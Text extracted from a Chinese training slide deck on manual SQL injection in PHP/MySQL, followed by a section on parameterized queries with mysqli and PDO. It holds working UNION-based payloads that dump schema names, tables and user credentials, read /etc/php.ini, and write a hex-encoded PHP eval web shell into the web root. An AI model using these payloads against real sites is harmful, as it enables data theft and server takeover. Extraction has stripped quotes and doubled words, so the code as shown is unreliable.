手工sql注入.ppt
16页
手工手工sql注入注入bkman1,手工,手工sql注入注入2,非参数化与参数化,非参数化与参数化sql3,IBM Security AppScan Standard情形一:sql帐号拥有information_schema库权限,提交参数未过虑第一步:判断是否可注入$type=$_GETtype;$sql=SELECT*FROM news WHERE type=$type;$sql=SELECT*FROM news WHERE type=$type;第二步:判断查询了多少字段http:/192.168.152.111/hm/index.php?type=1 UNION SELECT 1,2,3,4 FROM information_schema.TABLES1,手工,手工sql注入注入第三步:爆数据爆库的路径:UNION SELECT 1,2,datadir,4 FROM information_schema.TABLES爆所有库名:UNION SELECT 1,2,GROUP_CONCAT(SCHEMA_NAME),4 FROM information_schema.SCHEMATA爆所有表名:UNION SELECT 1,2,GROUP_CONCAT(TABLE_NAME),4 FROM information_schema.COLUMNS WHERE 1=1 AND TABLE_SCHEMA=test爆表字段:UNION SELECT 1,2,GROUP_CONCAT(column_name),4 FROM information_schema.COLUMNS WHERE 1=1 AND TABLE_SCHEMA=test爆数据:UNION SELECT 1,2,CONCAT(id,|,name,|,pass),4 FROM test.user 情形二:没有 information_schema库权限,提交参数未过虑第一步:猜表名UNION SELECT 1,2,3,4 FROM userUNION SELECT 1,2,3,4 FROM admin 或 AND(SELECT COUNT(*)FROM user)0第二步:猜字段名UNION SELECT 1,2,name,4 FROM user或 AND(SELECT COUNT(name)FROM user)0漏洞利用:1,读取系统文件UNION SELECT 1,2,LOAD_FILE(/etc/php.ini),4 FROM user或 UNION SELECT 1,2,LOAD_FILE(0 x2F6574632F7068702E696E69),4 FROM user2,写入文件UNION SELECT 1,2,CONCAT(id,|,NAME,|,pass),4 INTO OUTFILE/tmp/test.txt FROM user3,写入后门 UNION SELECT 1,2,0 x3C3F70687020406576616C28245F504F53545B636D645D293F3E,4 INTO OUTFILE/usr/local/www/test.php FROM user2,非参数化与参数化,非参数化与参数化sql非参数化sql:$sql=SELECT*FROM news WHERE type=$type;$query=mysql_query($sql);参数化sql:/*原始的*/$query=sprintf(SELECT*FROM Users where UserName=%s and Password=%s,mysql_real_escape_string($Username),mysql_real_escape_string($Password);mysql_query($query);/*原始进阶版的PHP-MySQLi */$db=new mysqli(localhost,user,pass,database);$stmt=$mysqli-prepare(SELECT priv FROM testUsers WHERE username=?AND password=?);$stmt-bind_param(ss,$user,$pass);$stmt-execute();/*php5.1后的pdo方式*/$dsn=mysql:host=$db_host;dbname=$db_name;$dbh=new PDO($dsn,$db_user,$db_password);$sql=SELECT name,location FROM users WHERE location=?AND name=?;$sth=$dbh-prepare($sql);$sth-execute(array($location,$name);$result=$sth-fetch(PDO:FETCH_OBJ);PHP 5.5.0 起不赞成使用mysql_connecDeprecated:mysql_connect():The mysql extension is deprecated and will be removed in the future:use mysqli or PDO instead3,IBM Security AppScan Standard分享结束分享结束谢谢!谢谢!。
医疗卫生人才供需分析-详解洞察.docx血液制品管理条例(2016修订)培训解读课件.pptx2024年1月浙江省高考英语真题试卷含答案.pdf岗位价值评估工具-美世2.0PPT课件.ppt2023-2024学年秋季小学三年级上册语文部编版课时练第4课《古诗三首》01(含答案).doc税收会统核算及相关操作.pptLNG储罐施工关键控制点总结.ppt影视视听语言3色彩光线影调.ppt高级无损检测技术资格人员超声检测培训复习题汇编.docx2024年江苏省南京市建邺区小升初语文试卷(原卷全解析版).docx电路图与实物图的相互转化课件.ppt医疗影像数据的加密传输与存储-详解洞察.docx
